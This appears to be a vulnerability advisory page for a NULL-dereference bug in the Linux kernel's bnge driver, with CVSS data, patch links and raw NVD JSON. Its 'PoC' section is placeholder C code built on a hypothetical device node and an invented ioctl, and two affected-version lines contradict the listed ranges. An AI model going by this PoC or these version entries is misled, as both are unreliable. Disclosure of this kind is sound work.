Security Vulnerability Report
CVE-2026-31621 CVSS 5.5 MEDIUM

Published: 2026-04-24 15:16:41
Last Modified: 2026-04-28 14:05:14
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bnge: return after auxiliary_device_uninit() in error path

When auxiliary_device_add() fails, the error block calls auxiliary_device_uninit() but does not return. The uninit drops the last reference and synchronously runs bnge_aux_dev_release(), which sets bd->auxr_dev = NULL and frees the underlying object. The subsequent bd->auxr_dev->net = bd->netdev then dereferences NULL, which is not a good thing to have happen when trying to clean up from an error.

Add the missing return, as the auxiliary bus documentation states is a requirement (seems that LLM tools read documentation better than humans do...)

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but excluding, 6.19.14) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 7.0 up to, but excluding, 7.0.1) - VULNERABLE
Linux Kernel < 6.6 (refer to the specific Git commit 38c383ec6d37f4b5597f8e6a1f5c2ab31ea01d3a)
Linux Kernel < 6.1 (refer to the specific Git commit 87bc3557c708110d83086bf091328271298a44e3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-31621
 * Conceptual trigger for bnge driver initialization failure.
 * Requires a system with the bnxe/bnge driver and specific hardware or emulation.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// This is a conceptual representation.
// In a real scenario, one might interact with the device node or sysfs
// to trigger the probe/init path where auxiliary_device_add fails.
int main(void)
{
    printf("Attempting to trigger CVE-2026-31621...\n");

    // Attempt to load or interact with the vulnerable module
    // This often requires specific hardware or forcing a load failure.
    // For demonstration, we assume the attacker can trigger the init path.
    int fd = open("/dev/bnge_control", O_RDWR); // Hypothetical device node
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Ioctl or operation that triggers the probe/init sequence
    // where auxiliary_device_add might fail (e.g., ENOMEM)
    if (ioctl(fd, 0x1337, NULL) < 0) {
        // If the logic bug exists, the kernel might crash here
        // due to the missing return after uninit.
        perror("Ioctl failed");
    }

    close(fd);
    printf("If vulnerable, the kernel may panic/crash.\n");
    return 0;
}

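References

https://git.kernel.org/stable/c/38c383ec6d37f4b5597f8e6a1f5c2ab31ea01d3a (Patch)
https://git.kernel.org/stable/c/87bc3557c708110d83086bf091328271298a44e3 (Patch)
https://git.kernel.org/stable/c/8b0c25528cb64f71a73b5c0d49cbbcb68540a4ce (Patch)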

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31621", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:41.380", "lastModified": "2026-04-28T14:05:14.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnge: return after auxiliary_device_uninit() in error path\n\nWhen auxiliary_device_add() fails, the error block calls\nauxiliary_device_uninit() but does not return. The uninit drops the\nlast reference and synchronously runs bnge_aux_dev_release(), which sets\nbd->auxr_dev = NULL and frees the underlying object. The subsequent\nbd->auxr_dev->net = bd->netdev then dereferences NULL, which is not a\ngood thing to have happen when trying to clean up from an error.\n\nAdd the missing return, as the auxiliary bus documentation states is a\nrequirement (seems that LLM tools read documentation better than humans\ndo...)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": 
"7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/38c383ec6d37f4b5597f8e6a1f5c2ab31ea01d3a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87bc3557c708110d83086bf091328271298a44e3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8b0c25528cb64f71a73b5c0d49cbbcb68540a4ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}